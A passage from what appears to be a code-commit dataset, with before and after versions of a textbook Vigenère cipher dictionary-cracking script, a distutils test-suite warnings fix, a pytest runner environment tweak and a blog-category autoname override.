word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
Update vigenereDictionaryHacker: added full path to dictionary file# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
<commit_before># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open('dictionary.txt')
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
<commit_msg>Update vigenereDictionaryHacker: added full path to dictionary file<commit_after># Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
DICTIONARY_FILE = "/home/jose/PycharmProjects/python-tutorials/books/CrackingCodesWithPython/Chapter11/dictionary.txt"
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackVigenereDictionary(ciphertext):
fo = open(DICTIONARY_FILE)
words = fo.readlines()
fo.close()
for word in words:
word = word.strip() # Remove the newline at the end.
decryptedText = decryptMessage(word, ciphertext)
if isEnglish(decryptedText, wordPercentage=40):
# Check with user to see if the decrypted key has been found:
print()
print('Possible encryption break:')
print('Key ' + str(word) + ': ' + decryptedText[:100])
print()
print('Enter D for done, or just press Enter to continue breaking:')
response = input('> ')
if response.upper().startswith('D'):
return decryptedText
if __name__ == '__main__':
main()
|
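The absolute `DICTIONARY_FILE` path introduced above pins the script to one machine. A more portable sketch resolves the dictionary relative to the module itself with `pathlib`, assuming the `Chapter11/dictionary.txt` layout is unchanged; this is an alternative, not what the commit did.

```python
# Portable alternative to a hard-coded absolute path (sketch).
from pathlib import Path

# Chapter20/vigenereDictionaryHacker.py -> ../Chapter11/dictionary.txt
DICTIONARY_FILE = Path(__file__).resolve().parents[1] / "Chapter11" / "dictionary.txt"
print(DICTIONARY_FILE)
```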
4b54a8a038d5f9f2ead224b030f87f393d57d40b
|
tests/__init__.py
|
tests/__init__.py
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
Fix test_copyreg when numpy is installed (GH-20935)
|
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.
|
Python
|
mit
|
pypa/setuptools,pypa/setuptools,pypa/setuptools
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
<commit_before>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
<commit_msg>bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.<commit_after>
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module."""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
<commit_before>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
import warnings
from test.support import run_unittest
here = os.path.dirname(__file__) or os.curdir
def test_suite():
old_filters = warnings.filters[:]
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources which adds a
# warnings filter.
warnings.filters[:] = old_filters
return suite
if __name__ == "__main__":
run_unittest(test_suite())
<commit_msg>bpo-41003: Fix test_copyreg when numpy is installed (GH-20935)
Fix test_copyreg when numpy is installed: test.pickletester now
saves/restores warnings.filters when importing numpy, to ignore
filters installed by numpy.
Add the save_restore_warnings_filters() function to the
test.support.warnings_helper module.<commit_after>"""Test suite for distutils.
This test suite consists of a collection of test modules in the
distutils.tests package. Each test module has a name starting with
'test' and contains a function test_suite(). The function is expected
to return an initialized unittest.TestSuite instance.
Tests for the command classes in the distutils.command package are
included in distutils.tests as well, instead of using a separate
distutils.command.tests package, since command identification is done
by import rather than matching pre-defined names.
"""
import os
import sys
import unittest
from test.support import run_unittest
from test.support.warnings_helper import save_restore_warnings_filters
here = os.path.dirname(__file__) or os.curdir
def test_suite():
suite = unittest.TestSuite()
for fn in os.listdir(here):
if fn.startswith("test") and fn.endswith(".py"):
modname = "distutils.tests." + fn[:-3]
# bpo-40055: Save/restore warnings filters to leave them unchanged.
# Importing tests imports docutils which imports pkg_resources
# which adds a warnings filter.
with save_restore_warnings_filters():
__import__(modname)
module = sys.modules[modname]
suite.addTest(module.test_suite())
return suite
if __name__ == "__main__":
run_unittest(test_suite())
|
19656decb756db364d012cbfb13d0ddf30e15bae
|
py/tests/test_runner.py
|
py/tests/test_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
Fix running python tests by changing the env directly
|
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)
|
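The one-line summary above turns on a CPython detail worth spelling out, per the os module documentation: os.putenv() updates the environment inherited by child processes but does not update the os.environ mapping, so in-process reads never see the value. A small illustrative sketch (DEMO_VAR is just a placeholder name):

import os

os.putenv("DEMO_VAR", "via-putenv")
print(os.environ.get("DEMO_VAR"))   # None: the os.environ mapping was not touched

os.environ["DEMO_VAR"] = "via-environ"
print(os.getenv("DEMO_VAR"))        # 'via-environ': assignment also calls putenv() internally

That is why the fix assigns PYTHONPATH and the PYSPARK_* variables through os.environ: pytest and pyspark run inside this same process and read the mapping directly.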
Python
|
apache-2.0
|
h2oai/sparkling-water,h2oai/sparkling-water,h2oai/sparkling-water,h2oai/sparkling-water
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
<commit_before>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
<commit_msg>[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)<commit_after>
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
<commit_before>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
<commit_msg>[SW-1610][FollowUp] Fix running python tests by changing the env directly
(cherry picked from commit 0d808a100cd14fce9d4fba4f9cde6ad5315fbc12)<commit_after>#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pytest
dist = sys.argv[2]
path = os.getenv("PYTHONPATH")
if path is None:
path = dist
else:
path = "{}:{}".format(dist, path)
os.putenv("PYTHONPATH", path)
os.putenv('PYSPARK_DRIVER_PYTHON', sys.executable)
os.putenv('PYSPARK_PYTHON', sys.executable)
os.environ["PYTHONPATH"] = path
os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable
os.environ['PYSPARK_PYTHON'] = sys.executable
sys.path.insert(0, dist)
pytestConfigArgs = sys.argv[1].replace("'", "").split(" ")
args = pytestConfigArgs + ["--dist", dist, "--spark_conf", ' '.join(sys.argv[3:])]
code = pytest.main(args)
sys.exit(code)
|
bc6999e5e587a5e4dfd8b65f168de8ebce8bc93b
|
webnotes/website/doctype/blog_category/blog_category.py
|
webnotes/website/doctype/blog_category/blog_category.py
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.webutils import WebsiteGenerator, cleanup_page_name, clear_cache
class DocType(WebsiteGenerator):
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
# to override autoname of WebsiteGenerator
self.doc.name = self.doc.category_name
def get_page_title(self):
return self.doc.title
def on_update(self):
WebsiteGenerator.on_update(self)
from webnotes.webutils import clear_cache
clear_cache()
|
